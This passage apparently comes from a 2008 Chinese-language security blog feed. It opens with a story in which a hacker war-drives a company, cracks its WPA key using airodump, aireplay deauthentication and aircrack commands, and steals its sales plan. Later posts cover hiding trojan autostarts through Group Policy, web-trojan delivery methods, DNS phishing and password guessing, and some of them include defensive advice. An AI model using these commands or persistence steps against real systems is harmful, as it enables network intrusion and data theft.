  下車後,他看到Seraph公司就在不遠的地方。他走進了Seraph公司的大樓,諮詢了一些業務。服務人員的態度很好,但守口如瓶,絲毫沒有透露一點內部資訊,這令Bacchus感到很失望。談了很長時間後,那服務人員的熱情依舊未冷卻,但Bacchus已經意識到沒有必要再談下去了,因為他右耳內的耳機已傳出美妙的旋律——“發現無線接入點”。
  於是他草草謝了那人就離開了,緊接著他就去了洗手間,見裡面沒人,便從口袋裡掏出了他的PDA。他真算是收到了一份十分不錯的賀禮。

他決定第三天發起總攻,因為他知道無線入侵也許要花很長時間,況且是對一個安全似乎做得不錯的公司網路進行無線入侵。
  第三天,他決定開車出去,進行War-Driving。這次,他用的是筆記型電腦。
  到了Seraph公司後,他便開始在它周邊緩慢行駛,因為這樣便於他進行操作,當然,油價也是個不可忽略的原因。他開始播放Tchaikovsky的《1812年序曲》的CD,因為他知道這首曲子可以在短短4分鐘內激發他的全部鬥志。
  他把每次入侵都看成一次表演,而他的主要任務不是對著螢幕呆板地敲擊鍵盤,而是把入侵藝術化。他總會事先在大腦中寫下一些基本的劇情,當然,他自然就是男主角了。他表演的時候十分投入。
  Bacchus將自己燒錄的BackTrack3 Live CD輕輕推入光碟機,接著他從光碟啟動,進入了BackTrack3。他欣喜異常,就像是見到了自己久違的朋友。確實,他已經有很長時間沒有見到它了。不過,他仍然對BackTrack3十分熟悉。  他打開命令列,輸入了“iwconfig”命令來檢查他的無線網卡是否被他的老友識別。答案是肯定的。  

  他的無線網卡的標識為“wlan0”)然後,他用Kismet對無線接入點進行掃描,成功地掃描出了昨日邂逅的那個Seraph內部的無線接入點。

  在掃到那個AP後,他還是結合了GPS定位確定了下,結果是那個AP絕對是Seraph公司的AP,這從地圖上可以清楚地看出來。他將游標移動到那個條目上,乾脆地敲了下回車鍵,Kisnet便顯示出了那個AP(無線接入點)的詳細資訊  

  並記下了那個AP的SSID、bssid和Channel,緊接著,他又返回主介面,仍選擇那個AP,按下“SHIFT+C”鍵,記下了目標AP的MAC位址。  


  他還發現Seraph公司的無線網路是用WPA加密的,這意味著破解的難度相對於WEP加密來說要大很多。然而這卻正中他的下懷,他正是期盼這種具有挑戰性的表演任務。
  下面,他將網卡調節到“monitor”模式,並將其頻道設置為3(Seraph公司AP的頻道),接著就開始嗅探並抓包了。他輸入了如下命令:
iwconfig wlan0 mode monitor
iwconfig wlan0 channel 3
airodump wlan0 capture1 00:a0:c5:90:40:df
  可以看到,IV(初始化向量)的數量正不斷增大。

  為了方便獲取WPA握手驗證封裝,Bacchus發起了DeAuthentication攻擊。雖然這會使AP不穩定,但這卻是破解WPA加密的重要手段。他輸入:
  aireplay -0 10 –a 00:a0:c5:90:40:df wlan0
  他只是試探性的進行了攻擊,發送成功。於是,他開始不斷攻擊。伴隨著攻擊次數的增多,IV數量也在較快地增長。
  幾個小時後,IV的數量就差不多達到破解的要求了。Bacchus便開啟了aircrack進行同步破解,不過還是花了將近2個小時才破解出來。
  影片中的高潮已經過去,最後就應該是個十分美好的結局。
  得到了密碼,Bacchus連上了Seraph公司的AP,進入了公司內網。這裡他幾乎暢通無阻,他盡可能地找些自己覺得有價值的資訊,當然,他最終找到了Seraph公司的銷售計畫。
  他準備回家時,已經是月色朦朧了。回家的路旁栽種了茂盛的棕櫚樹。他把車停在他家附近的一個停車場,便徒步走回家。那棵梧桐樹下,照舊有幾個大爺大媽坐在一起聊天,那些都是住在他附近的人。Bacchus走過去,微笑著向他們問好,他們也向他致意。在他們眼中,Bacchus總是那麼熱心。他也不忘到前面的Venus花店買一束鮮花,擺在自己的窗臺上,這些花大概是他淩亂房間唯一的風景吧。花店裡,那個叫Europa的女孩正在一旁欣賞著Stravinsky的《火鳥•公主之舞》。Bacchus見她十分投入,便不忍心打擾她。他自己從各樣的花中挑選出了一支玫瑰,他的臉不知為何突然一熱,又把玫瑰放了回去,轉而挑選了藍紫色的鳶尾花和純淨的白茅。他把錢放在櫃檯上,又似乎不小心在櫃檯上零落一點茅草芽,然後便悄然離開了。
  他把馨香的它們放在花瓶裡,又將花瓶放在對著街道的靠陽的窗臺上。
]]> http://safe.dchsoft.com/content/client/clients2.html?id=7 <![CDATA[隱形木馬在系統中的啟動方式]]> Snoopy http://safe.dchsoft.com/ service@dchsoft.com 2008-09-13T00:00:00+08:00 2008-09-13T00:00:00+08:00   另一種鮮為人知的啟動方式,是在“開始→運行”中執行“Gpedit.msc”。打開“群組原則”,可看到“本地電腦策略”中有兩個選項:“電腦配置”與“使用者配置”,展開“使用者配置→管理範本→系統→登錄”,按兩下“在使用者登錄時運行這些程式”子項進行屬性設置,選定“設置”項中的“已啟用”項並按一下“顯示”按鈕彈出“顯示內容”視窗,再按一下“添加”按鈕,在“添加專案”視窗內的文字方塊中輸入要自啟動的程式的路徑,如圖所示,按一下“確定”按鈕就完成了。
  添加需要啟動的檔面
  重新開機電腦,系統在登錄時就會自動啟動你添加的程式,如果剛才添加的是木馬程式,那麼一個“隱形”木馬就這樣誕生了。因為用這種方式添加的自啟動程式在系統的“系統組態實用程式”是找不到的,同樣在我們所熟知的註冊表項中也是找不到的,所以非常危險。
  通過這種方式添加的自啟動程式雖然被記錄在註冊表中,但是不在我們所熟知的註冊表的[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]項和[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]項內,而是在冊表的[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run]項。如果你懷疑你的電腦被種了“木馬”,可是又找不到它在哪兒,建議你到註冊表的[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run]項裡找找吧,或是進入“群組原則”的“在使用者登錄時運行這些程式”看看有沒有啟動的程式。
  現在網頁木馬無非有以下幾種方式中到你的機器裡
  1:把木馬檔改成BMP檔,然後配合你機器裡的DEBUG來還原成EXE,網上存在該木馬20%
  2:下載一個TXT檔到你機器,然後裡面有具體的FTP^-^作,FTP連上他們有木馬的機器下載木馬,網上存在該木馬20%
  3:也是最常用的方式,下載一個HTA檔,然後用網頁控制項解譯器來還原木馬。該木馬在網上存在50%以上
  4:採用JS腳本,用VBS腳本來執行木馬檔,該型木馬偷QQ的比較多,偷傳奇的少,大概占10%左右
  5:ARP欺騙,利用ARP欺騙攔截局域網資料,攻擊閘道。在資料包中插入木馬。解決方案,安裝ARP防火牆。
]]> http://safe.dchsoft.com/content/client/clients2.html?id=8 <![CDATA[駭客開始嘗試攻擊DNS漏洞 衍生]]> Snoopy http://safe.dchsoft.com/ service@dchsoft.com 2008-09-06T00:00:00+08:00 2008-09-06T00:00:00+08:00 為甚麼要攻擊|link|DNS|link|
先讓我們認識一下|link|DNS|link|
|link|DNS|link| 全名是 Domain Name System, 透過 |link|DNS|link| 系統, 我們可以由一部機器的 domain name 查其 IP, 也可以由機器的 IP 反查它的 domain name, 除此之外 |link|DNS|link| 還與 Mail System 結合, 提供 Mail routing 的功能.

也就是說如果攻擊了|link|DNS|link| 改變了指向的IP 那麼我就可以放置釣魚網站
想想如果你輸入www.gmail.com 然後轉到一個並非google的主機 且 畫面完全一樣
你是不會在當下馬上發現的....除非你用IP連線..除非你常看網站的憑證..
那麼你輸入了ID/PW接下來 就是你的ID/PW 傳送給駭客了...
所以|link|DNS|link| 是關鍵的 畢竟會直接用IP連線的人並不多且有些站台也不支援
如何保證瀏覽的不是釣魚網站? 或許你在輸入你熟悉的網站之前還是需要去注意一下安全憑證
]]> http://safe.dchsoft.com/content/client/clients2.html?id=5 <![CDATA[Hack的第一步是什麼?]]> Snoopy http://safe.dchsoft.com/ service@dchsoft.com 2008-07-23T00:00:00+08:00 2008-07-23T00:00:00+08:00 那麼,關鍵的第一步是甚麼?
答案是|link|資料的收集|link|
所謂資料的收集包含
1.公司或個人資訊
2.目標網站相關資訊
3.管理者相關資訊
這些是拿來幹嘛用的呢?為甚麼說這個是入侵的關鍵呢?
因為
我有另外一篇文章是人體工程學猜測密碼
其實它的衍生是
你入侵的網站不一定有|link|SQL Injection|link|或者|link|XSS|link|
那麼你怎麼得到管理者密碼?
就是利用密碼學去猜測
或者這樣說.|link|XSS|link|的目的也就是收集資料.
假如你有足夠多的資料或許可以破解出管理者的密碼
另外足夠的資料收集她會給你跟多的入侵入線
例如:我要入侵A網站 但是發現沒有任何的漏洞,那麼我發現B網站跟她有關,
恰巧發現B網站有漏洞.so?得到B網站的ID/PassWord讓候用這組ID/Password進入A網站,或者|link|滲透|link|
很多網站都有類似的問題...為了避免被公幹 so 不列出名單了]]> http://safe.dchsoft.com/content/client/clients2.html?id=3 <![CDATA[人體工程學猜測密碼]]> Snoopy http://safe.dchsoft.com/ service@dchsoft.com 2008-07-23T00:00:00+08:00 2008-07-23T00:00:00+08:00 如果你設定密碼 會怎麼設定?
1.生日<---太常見了 大多數人的銀行卡密碼就是這個
2.最在乎的日子
3.喜歡的人的名字
4.自己的名字
5.電話
6.注音輸入的人名中文組合
7.以上任意組合

以上都是一些關聯
你要知道他這個人的喜好和周圍的事情然後去做猜測 命中率會比較高
所以建議使用短句變形
例如:Who Can know That?
改成:Wh0.c@n.kn0w.th@t/
或者:xip.dbm.lmpy.uibu?

還有一點,大多數人的密碼喜歡用同一組千萬不要這樣哦~
如果是不重要的東西可以都設定同一組密碼.
可是呢如果重要的東西,建議 設定不同組.應為你無法保證你什麼時候密碼會外洩
導致你其他的東西都被了解 例如你在A網站設定的密碼跟郵箱密碼一樣,那麼如果我今天Hack到A網站那麼就有機會得到你的郵箱密碼
這個問題呢,很少人注意到,不過還是有大約30 percent 的人會去注意這個問題.當然剩下70 percent 的人只有自求多福了

以上為史先生的拙見]]> http://safe.dchsoft.com/content/client/clients2.html?id=4 <![CDATA[惡意連接]]> Snoopy http://safe.dchsoft.com/ service@dchsoft.com 2008-07-20T00:00:00+08:00 2008-07-20T00:00:00+08:00 http://safe.dchsoft.com/content/client/clients2.html?id=1 <![CDATA[木馬程式]]> Snoopy http://safe.dchsoft.com/ service@dchsoft.com 2008-07-20T00:00:00+08:00 2008-07-20T00:00:00+08:00 http://safe.dchsoft.com/content/client/clients2.html?id=2